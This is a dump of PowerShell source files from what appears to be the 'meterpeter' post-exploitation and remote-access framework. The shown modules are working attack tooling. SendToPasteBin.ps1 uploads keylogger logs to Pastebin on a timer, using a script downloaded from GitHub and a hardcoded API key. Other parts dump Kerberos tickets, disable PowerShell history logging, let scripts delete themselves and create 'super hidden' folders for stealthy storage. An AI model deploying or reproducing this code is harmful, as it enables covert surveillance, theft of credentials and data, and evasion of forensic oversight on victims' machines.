$currentsessioninfo.'Authentication Method'\r\n\tif ($OS.Buildnumber -lt 9200)\r\n\t\t{\r\n\t\tWrite-Host \"Kerberos Tickets for LogonID $SessionID\"\r\n\t\t\"Kerberos Tickets for LogonID $SessionID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\tWrite-Host \"Kerberos Tickets for $ID\"\r\n\t\t\"Kerberos Tickets for $ID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\tWrite-Host \"*****************************\"\r\n\t \"*****************************\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-Host \"Logon Type: $LogonType\"\r\n\t\"Logon Type: $LogonType\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-host \"Session ID: $SessionID\"\r\n\t\"Session ID: $SessionID\" | Out-File $ExportFile -Append -Encoding utf8\r\n\tWrite-host \"Auth Method: $AuthMethod\"\r\n\t\"Auth Method: $AuthMethod\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t$SessionTickets = ReturnSessionTickets $Session\r\n\r\n\t\r\n\t$TGT = ReturnSessionTGTs $SessionID\r\n\t$TGT | FL *\r\n\t$TGT | Out-File $ExportFile -Append -Encoding utf8\r\n\t\r\n\tif ($SessionTickets -notmatch 'Ticket')\r\n\t\t{\r\n\t\tWrite-Host \"Session TGT: No tickets for this session in cache.\"\r\n\t\t\"Session TGT: No tickets for this session in cache.\" | Out-File $ExportFile -Append -Encoding utf8\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t$SessionTickets | FL *\r\n\t\t$SessionTickets\t| FL * | Out-File $ExportFile -Append -Encoding utf8 \r\n\t\t}\r\n\tWrite-Host \"`n\"\r\n\t \"`n\" | Out-File $ExportFile -Append -Encoding utf8\r\n\r\n}\r\n\r\n#Clean artifacts left behind\r\nRemove-Item -Path \"$ExportFile\" -Force\r\n" }, { "path": "mimiRatz/Invoke-Winget.ps1", "content": "<#\r\n.SYNOPSIS\r\n [Silent] manage applications from microsoft store\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19044) x64 bits\r\n Required Dependencies: WinGet, UserLand\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v1.0.4\r\n\r\n.DESCRIPTION\r\n Auxiliary Module of meterpeter v2.10.13 that invokes winget command line\r\n tool that enables users to list, discover, install, uninstall applications\r\n in silent mode under windows 10 (build >16299) or 11 operative system versions.\r\n\r\n.NOTES\r\n When running winget without administrator privileges, some applications may\r\n require elevation to install. When the installer runs, Windows will prompt\r\n you to elevate. If you choose not to elevate application will fail install.\r\n\r\n.Parameter Action\r\n list, discover, install, uninstall (default: list)\r\n\r\n.Parameter Program\r\n The application name (default: off)\r\n\r\n.Parameter Id\r\n The application ID (default: off)\r\n\r\n.Parameter AutoDelete\r\n Delete cmdlet in the end? (default: off)\r\n\r\n.Parameter Force\r\n Install winget application on local computer!\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\Invoke-Winget.ps1 -force\r\n Install winget appl on local computer!\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\Invoke-Winget.ps1 -action 'list'\r\n List installed applications of local computer\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\Invoke-Winget.ps1 -action 'discover' -Program 'games'\r\n Search in msstore for applications named 'games' to install\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\Invoke-Winget.ps1 -action 'install' -Program 'Python 3.11' -Id '9NRWMJP3717K'\r\n Silent install program 'Python 3.11' with ID '9NRWMJP3717K' from microsoft store\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\Invoke-Winget.ps1 -action 'uninstall' -Program 'Python 3.11' -Id '9NRWMJP3717K'\r\n Silent Uninstall program 'Python 3.11' with ID '9NRWMJP3717K' from local computer\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into Invoke-Winget.ps1\r\n\r\n.OUTPUTS\r\n * Manage applications from microsoft store.\r\n\r\n Nome ID Versão \r\n ---------------------------------------------------------------------------------------------\r\n Netflix 4DF9E0F8.Netflix_mcm4njqhnhss8 6.98.1805.0\r\n ShareX ShareX.ShareX 13.4.0\r\n AMD Software AMD Catalyst Install Manager 9.0.000.8\r\n MyASUS-Service Center B9ECED6F.MyASUS_qmba6cd70vzyy 3.3.11.0\r\n ASUS ZenLink B9ECED6F.ZenSync_qmba6cd70vzyy 1.0.7.0\r\n Battle.net Battle.net Unknown\r\n Conexant HD Audio CNXT_AUDIO_HDA 8.66.95.69\r\n\r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n https://learn.microsoft.com/en-us/windows/package-manager/winget\r\n#>\r\n\r\n\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$AutoDelete=\"off\",\r\n [string]$Program=\"off\",\r\n [string]$Action=\"list\",\r\n [string]$Id=\"off\",\r\n [int]$Delay='1700',\r\n [switch]$Force\r\n)\r\n\r\n\r\n$cmdletver = \"v1.0.4\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n## Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$OperativeSystem = [System.Environment]::OSVersion.Version\r\n$host.UI.RawUI.WindowTitle = \"@Invoke-WinGet $cmdletver\"\r\n\r\nIf($AutoDelete -iMatch '^(off)$')\r\n{\r\n write-host \"* Manage applications from microsoft store.`n\" -ForegroundColor Green\r\n}\r\n\r\n## Check operative system version\r\n$OsVersion = $OperativeSystem.Major\r\nIf(-not($OsVersion -match '^(10|11)$'))\r\n{\r\n write-host \" > Error: Operative system version '$OsVersion' not suported!`n\" -ForegroundColor Red\r\n return\r\n}\r\n\r\n## Check operative system build\r\n$OsBuild = $OperativeSystem.Build\r\nIf(($OsVersion -match '^(10)$') -and ($OsBuild -lt \"16299\"))\r\n{\r\n write-host \" > Error: Operative system build '$OsBuild' not suported!`n\" -ForegroundColor Red\r\n return\r\n}\r\n\r\n## Make sure Winget application is installed\r\n$CheckInstall = (Get-Command \"winget\" -EA SilentlyContinue).Source\r\nIf([string]::IsNullOrEmpty($CheckInstall))\r\n{\r\n If($Force.IsPresent)\r\n {\r\n ## Download and install winget application using the latest release available.\r\n Add-AppxPackage \"https://github.com/microsoft/winget-cli/releases/latest/download/Microsoft.DesktopAppInstaller_8wekyb3d8bbwe.msixbundle\"\r\n }\r\n Else\r\n {\r\n write-host \" > Error: Command line tool 'winget' missing!`n\" -ForegroundColor Red\r\n return\r\n }\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(list)$')\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n list installed packets [local PC]\r\n :meterpeter:post:msstore> list\r\n #>\r\n\r\n ## Command\r\n winget list\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(discover)$')\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n search for application [msstore]\r\n :meterpeter:post:msstore> discover\r\n #>\r\n\r\n ## Cmdlet parameters checks\r\n If($Program -iMatch 'off')\r\n {\r\n write-host \" > Error: -program parameter required!`n\" -ForegroundColor Red\r\n return\r\n }\r\n\r\n ## Search for pacakage in microsoft store\r\n winget search --name \"$Program\" --exact|Out-File -FilePath \"$Env:TMP\\Skynet.log\" -Force\r\n $Pacakage = (Get-Content -Path \"$Env:TMP\\Skynet.log\"|Select-String -Pattern \"$Program\")\r\n If([string]::IsNullOrEmpty($Pacakage))\r\n {\r\n write-host \" > Error: program '$Program' not found in msstore!`n\" -ForegroundColor Red\r\n }\r\n Else\r\n {\r\n ## Sanitize command output\r\n $SanitizeOutput = (Get-Content -Path \"$Env:TMP\\Skynet.log\") -replace '(\\\\|/|£)',''\r\n echo $SanitizeOutput\r\n }\r\n\r\n ## CleanUp\r\n Remove-Item -Path \"$Env:TMP\\Skynet.log\" -Force\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(install)$')\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Install application [msstore]\r\n :meterpeter:post:msstore> install\r\n\r\n .NOTES\r\n Parameters -program and -id are mandatory\r\n #>\r\n\r\n ## Cmdlet parameters checks\r\n If(($Program -iMatch 'off') -or ($Id -iMatch 'off'))\r\n {\r\n write-host \" > Error: -program and -id parameters required!`n\" -ForegroundColor Red\r\n return\r\n }\r\n\r\n ## Search for Pacakage in microsoft store\r\n $IsAvailable = (Winget search --name \"$Program\" --exact|Select-String -Pattern \"$Program\")\r\n If([string]::IsNullOrEmpty($IsAvailable))\r\n {\r\n write-host \" > Error: program '$Program' not found in msstore!`n\" -ForegroundColor Red\r\n return \r\n }\r\n\r\n ## Silent install program from microsoft store\r\n winget install --name \"$Program\" --id \"$Id\" --silent --force --accept-package-agreements --accept-source-agreements --disable-interactivity\r\n If($? -match 'false')\r\n {\r\n write-host \"`n > Fail: Installing -program '$Program' -id '$Id' from msstore`n\" -ForegroundColor Red\r\n return \r\n }\r\n}\r\n\r\n\r\nIf($Action -iMatch '^(uninstall)$')\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Uninstall application [local PC]\r\n :meterpeter:post:msstore> uninstall\r\n\r\n .NOTES\r\n Parameters -program and -id are mandatory\r\n #>\r\n\r\n ## Cmdlet parameters checks\r\n If(($Program -iMatch 'off') -or ($Id -iMatch 'off'))\r\n {\r\n write-host \" > Error: -program and -id parameters required!`n\" -ForegroundColor Red\r\n return\r\n }\r\n\r\n ## Search for Pacakage locally\r\n $IsAvailable = (Winget list|Select-String -Pattern \"$Program\")\r\n If([string]::IsNullOrEmpty($IsAvailable))\r\n {\r\n write-host \" > Error: program '$Program' not found! [local]`n\" -ForegroundColor Red\r\n return \r\n }\r\n\r\n ## Silent Uninstall program from local machine\r\n winget uninstall --name \"$Program\" --id \"$Id\" --silent --force --purge --disable-interactivity\r\n If($? -match 'false')\r\n {\r\n write-host \"`n > Fail: Uninstalling -program '$Program' -id '$Id' [local]`n\" -ForegroundColor Red\r\n return\r\n }\r\n}\r\n\r\n\r\n## Give extra time to finish tasks\r\nStart-Sleep -Milliseconds $Delay\r\n\r\n## CleanUp\r\nIf($AutoDelete -iMatch '^(on)$')\r\n{\r\n ## Auto Delete this cmdlet in the end ...\r\n Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}" }, { "path": "mimiRatz/SendToPasteBin.ps1", "content": "<#\r\n.SYNOPSIS\r\n Get filepath contents and paste it to pastebin.\r\n \r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19042) x64 bits\r\n Required Dependencies: Inv`oke-We`bRequ`est {native}\r\n Optional Dependencies: Out-PasteBin.ps1 {auto}\r\n PS cmdlet Dev version: v1.1.5\r\n \r\n.DESCRIPTION\r\n Uses Out-PasteBin.ps1 cmdlet to take the contents of -filepath 'string'\r\n and creates a new pastebin paste from it on the sellected account with\r\n sellected time intervals (120 sec) a max of 20 times (20 pastes max)\r\n\r\n.NOTES\r\n PasteBin accepts the max of 20 pastes per day on 'free' accounts.\r\n So -MaxPastes 'int' and -TimeOut 'int' must be careful calculated.\r\n Eg: -maxpastes '20' -timeout '1' will reach 20 pastes in 20 sec\r\n \r\n.Parameter FilePath\r\n The filepath to send to pastebin\r\n\r\n.Parameter PastebinUsername\r\n PasteBin UserName to authenticate to\r\n\r\n.Parameter PastebinPassword\r\n PasteBin Password to authenticate to\r\n\r\n.Parameter PastebinDeveloperKey\r\n The pasteBin API key to authenticate with\r\n\r\n.Parameter MaxPastes\r\n The max number of pastes to create (max: 20)\r\n\r\n.Parameter TimeOut\r\n Create paste each xxx seconds (min: 120)\r\n Remark: No time limmit if -maxpastes '1'\r\n\r\n.EXAMPLE\r\n PS C:\\> Get-Help .\\SendToPasteBin.ps1 -full\r\n Access this cmdlet comment based help!\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SendToPasteBin.ps1 -FilePath \"test.log\" -PastebinUsername \"r00t-3xp10it\" -PastebinPassword \"MyS3cr3TPassword\"\r\n Get the contents of -filepath 'string' and creates a new pastebin paste from it on the sellected pastebin account.\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SendToPasteBin.ps1 -FilePath \"test.log\" -timeout \"120\" -maxpastes \"10\" -PastebinUsername \"r00t-3xp10it\" -PastebinPassword \"MyS3cr3TPassword\"\r\n Get the contents of -filepath 'string' and creates a new pastebin paste from it each 120 seconds a max of 10 pastes on the sellected pastebin account.\r\n\r\n.INPUTS\r\n None. You cannot pipe objects into SendToPasteBin.ps1\r\n\r\n.OUTPUTS\r\n * Out-PasteBin aux cmdlet\r\n * Downloading Out-PasteBin cmdlet ..\r\n + Maxpastes_Counter : 1º paste\r\n\r\n * Out-PasteBin cmdlet by BankSecurity\r\n * PastebinDeveloperKey : 1ab4a1a4e39c94db4f653127a45e7159\r\n + PastebinUsername : r00t-3xp10it\r\n + PasteTitle : SKYNET_15_33_15\r\n * PasteBin Url: https://pastebin.com/jVT6BKWL\r\n * PasteBin accepts the max of 20 pastes per day.\r\n\r\n + Maxpastes_Counter : 2º paste\r\n\r\n * Out-PasteBin cmdlet by BankSecurity\r\n * PastebinDeveloperKey : 1ab4a1a4e39c94db4f653127a45e7159\r\n + PastebinUsername : r00t-3xp10it\r\n + PasteTitle : SKYNET_15_35_15\r\n * PasteBin Url: https://pastebin.com/GiK9DASD\r\n * PasteBin accepts the max of 20 pastes per day.\r\n \r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter\r\n https://github.com/r00t-3xp10it/redpill/blob/main/bin/Out-Pastebin.ps1\r\n#>\r\n\r\n\r\n#CmdLet Global variable declarations!\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$PastebinDeveloperKey='1ab4a1a4e39c94db4f653127a45e7159',\r\n [string]$PastebinUsername=\"r00t-3xp10it\",\r\n [string]$PasteTitle=\"$Env:COMPUTERNAME\",\r\n [string]$FilePath=\"$Env:TMP\\void.log\",\r\n [string]$PastebinPassword=\"s3cr3t\",\r\n [string]$Egg=\"False\",\r\n [int]$MaxPastes='1',\r\n [int]$TimeOut='120'\r\n)\r\n\r\n\r\n$cmdletVersion = \"v1.1.5\"\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$host.UI.RawUI.WindowTitle = \"SendToPasteBin $cmdletVersion\"\r\nIf($Egg -ieq \"False\")\r\n{\r\n write-host \"`n* SendToPasteBin aux cmdlet\" -ForegroundColor Green\r\n}\r\n\r\n## Limmit ranges\r\nIf($MaxPastes -gt 20)\r\n{\r\n ## Max pastes allowed\r\n [int]$MaxPastes = 10\r\n}\r\n\r\n## Min loop jump timeout\r\nIf($TimeOut -lt 120)\r\n{\r\n ## No time limmit if 1 paste\r\n If($MaxPastes -gt 1)\r\n {\r\n [int]$TimeOut = 120\r\n }\r\n}\r\n\r\n\r\nFor($i=0; $i -lt $MaxPastes; $i++)\r\n{\r\n Start-Sleep -Seconds $TimeOut ## Loop jump timeout\r\n If(-not(Test-Path -Path \"$Env:TMP\\Out-Pastebin.ps1\" -EA SilentlyContinue))\r\n {\r\n ## Download Out-Pastebin cmdlet from my github repository\r\n If($Egg -ieq \"False\"){write-host \"* Downloading Out-PasteBin cmdlet ..\" -ForegroundColor Green}\r\n iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/bin/Out-Pastebin.ps1\" -OutFile \"$Env:TMP\\Out-Pastebin.ps1\"|Unblock-File \r\n }\r\n\r\n If($Egg -ieq \"False\")\r\n {\r\n ## Display OnScreen the loop counter!\r\n write-host \" + \" -ForegroundColor DarkYellow -NoNewline\r\n write-host \"Maxpastes_Counter : \" -NoNewline\r\n write-host \"${i}\" -ForegroundColor Green -NoNewline\r\n write-host \"º paste\"\r\n }\r\n\r\n ## Make sure that -FilePath 'file' exists\r\n If(Test-path -Path \"$FilePath\" -EA SilentlyContinue)\r\n {\r\n ## Parse filepath data (@Meterpeter keylogger)\r\n $ParseDatas = (Get-Content -Path \"$FilePath\")\r\n echo $ParseDatas > \"$Env:TMP\\ParseData.log\"\r\n\r\n $rand = (Get-Date -Format 'HH:mm:ss') -replace ':','_'\r\n Import-Module -Name \"$Env:TMP\\Out-PasteBin.ps1\" -Force\r\n Out-Pastebin -InputObject $(Get-Content -Path \"$Env:TMP\\ParseData.log\") -PasteTitle \"${PasteTitle}_${rand}\" -ExpiresIn \"1W\" -Visibility \"Private\" -PastebinUsername \"$PastebinUsername\" -PastebinPassword \"$PastebinPassword\" -PastebinDeveloperKey \"$PastebinDeveloperKey\"\r\n\r\n ## Local Cleanup\r\n Remove-Item -Path \"$Env:TMP\\parsedata.log\" -Force\r\n }\r\n}\r\n\r\n\r\n## Cleanup\r\nRemove-Item -Path \"$Env:TMP\\parsedata.log\" -Force\r\nRemove-Item -Path \"$Env:TMP\\Out-PasteBin.ps1\" -Force\r\nIf($Egg -ieq \"True\")\r\n{\r\n ## Auto-Delete this cmdlet (@Meterpeter C2 internal function)\r\n Remove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\n}" }, { "path": "mimiRatz/SuperHidden.ps1", "content": "<#\r\n.SYNOPSIS\r\n Query\\Create\\Delete super hidden system folders\r\n\r\n Author: @r00t-3xp10it\r\n Tested Under: Windows 10 (19043) x64 bits\r\n Required Dependencies: attrib {native}\r\n Optional Dependencies: none\r\n PS cmdlet Dev version: v1.2.18\r\n\r\n.DESCRIPTION\r\n This cmdlet allow users to Query\\Create\\Delete super hidden folders.\r\n Super hidden folders contains 'Hidden, System' attributes set and it\r\n does not show-up in explorer even if 'show hidden files' are activated.\r\n\r\n.NOTES\r\n This cmdlet allow users to search for 'hidden' or 'super hidden' directorys\r\n in input location (recursive, non-recursive), creates 'super hidden' folder,\r\n 'hidde folder', 'un-hidde folder' and 'delete' super hidden directorys ..\r\n Remark: Admin privileges required to create folders outside %userprofile%.\r\n Remark: The -Recursive 'true' arg requires of an -Directory input by user.\r\n\r\n.Parameter Action\r\n Accepts arguments: query, hidden, visible, delete (default: query)\r\n\r\n.Parameter Directory\r\n The query\\create\\delete folder directory path (default: false)\r\n\r\n.Parameter FolderName\r\n The folder name to query\\create\\delete (default: false)\r\n\r\n.Parameter Recursive\r\n Search super hidden folders recursive? (default: false)\r\n\r\n.Parameter Attributes\r\n The directory attributes (default: Hidden, System)\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query\r\n Search for 'Hidden, System' folders on predefined locations\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP\r\n Search for 'Hidden, System' folders on %TMP% location\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -Recursive true\r\n Search for 'Hidden, System' folders on %TMP% location 'recursive' (sub-folders)\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -attributes Hidden\r\n Search for folders with 'Hidden' attribute (not super Hidden, System) on %TMP%\r\n \r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -FolderName vault\r\n Search for 'Hidden, System' folders on %TMP% location with the name of 'vault'\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Hidden -Directory $Env:TMP -FolderName vault\r\n Create\\Modify 'Hidden, System' folder on %TMP% location with the name of 'vault' \r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Visible -Directory $Env:TMP -FolderName vault\r\n Create\\modify 'VISIBLE, System' folder on %TMP% location with the name of 'vault' \r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Delete -Directory $Env:TMP -FolderName vault\r\n Delete the super hidden 'Hidden, System' folder of %TMP% with the name of 'vault'\r\n\r\n.EXAMPLE\r\n PS C:\\> .\\SuperHidden.ps1 -Action Query -Directory $Env:TMP -Attributes \"(Hidden|System)\" -Recursive true\r\n Search for 'Hidden' OR 'System' directorys on %TMP% location in 'recursive' mode (scan sub-folders) \r\n\r\n.INPUTS\r\n None. You cannot pipe objects into SuperHidden.ps1\r\n\r\n.OUTPUTS\r\n FullName CreationTime LastAccessTime Attributes\r\n -------- ------------ -------------- ----------\r\n C:\\Users\\pedro\\AppData\\Local\\Temp\\vault 15/11/2021 07:17:42 15/11/2021 07:20:44 Hidden, System, Directory\r\n\r\n.LINK\r\n https://github.com/r00t-3xp10it/meterpeter/releases/tag/v2.10.10\r\n#>\r\n\r\n\r\n#CmdLet Global variable declarations!\r\n[CmdletBinding(PositionalBinding=$false)] param(\r\n [string]$Attributes=\"Hidden, System\",\r\n [string]$FolderName=\"false\",\r\n [string]$Directory=\"false\",\r\n [string]$Recursive=\"false\",\r\n [string]$Action=\"Query\"\r\n)\r\n\r\n\r\n$ErrorActionPreference = \"SilentlyContinue\"\r\n#Disable Powershell Command Logging for current session.\r\nSet-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null\r\n$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match \"S-1-5-32-544\")\r\nIf($Action -ieq \"Query\" -and $Directory -ieq \"false\")\r\n{\r\n If($Attributes -iMatch '^(Hidden)$')\r\n {\r\n Write-Host \"Searching hidden folders in common locations ..\" -ForegroundColor Blue \r\n }\r\n ElseIf($Attributes -iMatch '^(Hidden, System)$')\r\n {\r\n Write-Host \"Searching super hidden folders in common locations ..\" -ForegroundColor Blue\r\n }\r\n Else\r\n {\r\n Write-Host \"Searching '$Attributes' folders in common locations ..\" -ForegroundColor Blue \r\n }\r\n}\r\n\r\n\r\nWrite-Host \"`n\"\r\n#Build ramdom search output DataTable!\r\n$supertable = New-Object System.Data.DataTable\r\n$supertable.Columns.Add(\"Attributes \")|Out-Null\r\n$supertable.Columns.Add(\"Length\")|Out-Null\r\n$supertable.Columns.Add(\"FullName\")|Out-Null\r\n$supertable.Columns.Add(\"LastAccessTime\")|Out-Null\r\n\r\n\r\nIf($Action -ieq \"Query\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Query for hidden folders with 'hidden, system' attributes set.\r\n \r\n .NOTES\r\n This function allow users to search for hidden folders on predefined locations\r\n or accepts the absoluct path of the directory to query (not recursive), it also\r\n accepts the '-FolderName' parameter to search for sellected directory existence.\r\n Remark: The -Recursive 'true' argument requires of an -Directory input by user.\r\n\r\n .OUTPUTS\r\n Attributes Length FullName LastAccessTime \r\n --------------- ------ -------- --------------\r\n Hidden, System 0 C:\\Program Files\\Windows Sidebar 11/18/2021 09:32:55\r\n Hidden, System 2 C:\\Program Files (x86)\\Windows Sidebar 11/18/2021 03:13:06\r\n Hidden, System 61 C:\\Users\\pedro\\AppData\\Local\\Temp\\vault 11/18/2021 09:34:10\r\n #>\r\n\r\n If($Directory -ieq \"false\")\r\n {\r\n\r\n $CommonLocations = @(\r\n \"$Env:TMP\",\r\n \"$Env:APPDATA\",\r\n \"$Env:USERPROFILE\", \r\n \"$Env:LOCALAPPDATA\",\r\n \"$Env:PROGRAMFILES\",\r\n \"${Env:PROGRAMFILES(X86)}\",\r\n \"$Env:USERPROFILE\\Desktop\",\r\n \"$Env:USERPROFILE\\Documents\"\r\n )\r\n\r\n ForEach($Item in $CommonLocations)\r\n {\r\n #Search for hidden,system folders on predefined locations (random search)\r\n $RawList = (Get-ChildItem -Path \"$Item\" -Force | Select-Object * | Where-Object { \r\n $_.PSIsContainer -eq 'True' -and $_.Attributes -iMatch \"$Attributes\"\r\n }).FullName\r\n\r\n If($RawList)\r\n {\r\n ForEach($Entry in $RawList)\r\n {\r\n\r\n #Add each indevidual entry to database now.\r\n $DirLength = (Get-ChildItem -Path \"$Entry\").Length\r\n $LastAccessTime = (Get-ChildItem -Path \"$Entry\").LastAccessTime | Select-Object -Last 1\r\n $supertable.Rows.Add(\"$Attributes\",\"$DirLength\",\"$Entry\",\"$LastAccessTime\")|Out-Null\r\n }\r\n }\r\n }\r\n\r\n #Display DataTable contents onscreen\r\n $supertable | Format-Table -AutoSize | Out-String -Stream | Select-Object -Skip 1 | ForEach-Object {\r\n $stringformat = If($_ -Match '^(Attributes)')\r\n {\r\n @{ 'ForegroundColor' = 'Green' }\r\n }\r\n Else\r\n {\r\n @{ 'ForegroundColor' = 'White' }\r\n }\r\n Write-Host @stringformat $_\r\n }\r\n\r\n }\r\n ElseIf($Directory -ne \"false\")\r\n {\r\n\r\n If(-not(Test-Path -Path \"$Directory\" -EA SilentlyContinue))\r\n {\r\n #Making sure that the directory input exists before go any further..\r\n Write-Host \"error: not found: '$Directory'`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n \r\n If($FolderName -ne \"false\")\r\n {\r\n If($Recursive -ieq \"true\")\r\n {\r\n #FolderName parameter user input recursive search function\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Recurse -Force| Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and\r\n $_.Attributes -iMatch \"$Attributes\" -and $_.FullName -iNotMatch 'Packages'\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n }\r\n Else\r\n {\r\n #FolderName parameter user input search function\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Force| Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and $_.Attributes -iMatch \"$Attributes\"\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize \r\n }\r\n\r\n If(-not($SHdb))\r\n {\r\n Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n Else\r\n {\r\n echo $SHdb\r\n }\r\n\r\n }\r\n Else\r\n {\r\n\r\n If($Recursive -ieq \"true\")\r\n {\r\n #Query for hidden,system folders in -Directory argument location\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Recurse -Force | Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Attributes -Match \"$Attributes\" -and $_.FullName -iNotMatch 'Packages'\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n }\r\n Else\r\n {\r\n #Query for hidden,system folders in -Directory argument location\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Attributes -iMatch \"$Attributes\"\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize \r\n }\r\n\r\n If(-not($SHdb))\r\n {\r\n Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n Else\r\n {\r\n echo $SHdb\r\n }\r\n\r\n }\r\n }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Hidden\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Create one hidden,system folder on sellected location!\r\n\r\n .NOTES\r\n This function creates or modify the sellected folder attributes.\r\n Admin privileges required to create folders outside userprofile tree.\r\n #>\r\n\r\n If($Directory -ieq \"false\")\r\n {\r\n $Directory = \"$Env:TMP\"\r\n }\r\n\r\n If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n {\r\n If($IsClientAdmin -iMatch 'False')\r\n {\r\n #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit @SuperHidden\r\n }\r\n }\r\n\r\n If($FolderName -ieq \"false\"){$FolderName = \"vault\"}\r\n If(-not(Test-Path -Path \"$Directory\\$FolderName\" -EA SilentlyContinue))\r\n {\r\n #Make sure that the directory\\folder exists\r\n mkdir $Directory\\$FolderName -Force|Out-Null\r\n }\r\n\r\n try{#hidde sellected folder\r\n attrib +s +h $Directory\\$FolderName\r\n }catch{#Fail to modify sellected directory attributes\r\n Write-Host \"Error: fail to change directory attributes.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit SuperHidden\r\n }\r\n\r\n #Search for hidden,system folder created\\modified..\r\n $SHdb = Get-ChildItem -Path \"$Directory\" -Force | Select-Object * |\r\n Where-Object { $_.PSIsContainer -eq 'True' -and $_.Name -iMatch \"$FolderName\" -and $_.Attributes -iMatch 'Hidden, System'\r\n } | Select-Object FullName,CreationTime,LastAccessTime,Attributes | Format-Table -AutoSize\r\n\r\n If(-not($SHdb))\r\n {\r\n Write-Host \"Error: fail to match the search criteria.`n\" -ForegroundColor Red -BackgroundColor Black\r\n }\r\n Else\r\n {\r\n echo $SHdb\r\n }\r\n\r\n}\r\n\r\n\r\nIf($Action -ieq \"Visible\")\r\n{\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Create one VISIBLE,system folder on sellected location!\r\n\r\n .NOTES\r\n This function creates or modify the sellected folder attributes.\r\n Admin privileges required to create folders outside userprofile tree.\r\n #>\r\n\r\n If($Directory -ieq \"false\")\r\n {\r\n $Directory = \"$Env:TMP\"\r\n }\r\n\r\n If($Directory -iMatch '^C:\\\\Windows' -or $Directory -iMatch '^C:\\\\Program Files')\r\n {\r\n If($IsClientAdmin -iMatch 'False')\r\n {\r\n #Making sure that the directory structure does not start with C:\\Windows if we have UserLand privs!\r\n Write-Host \"Error: Admin privileges required to manipulate sellected directory.`n\" -ForegroundColor Red -BackgroundColor Black\r\n exit #Exit @SuperHidden\r\n }\r\n }\r\n\r\n If($FolderName 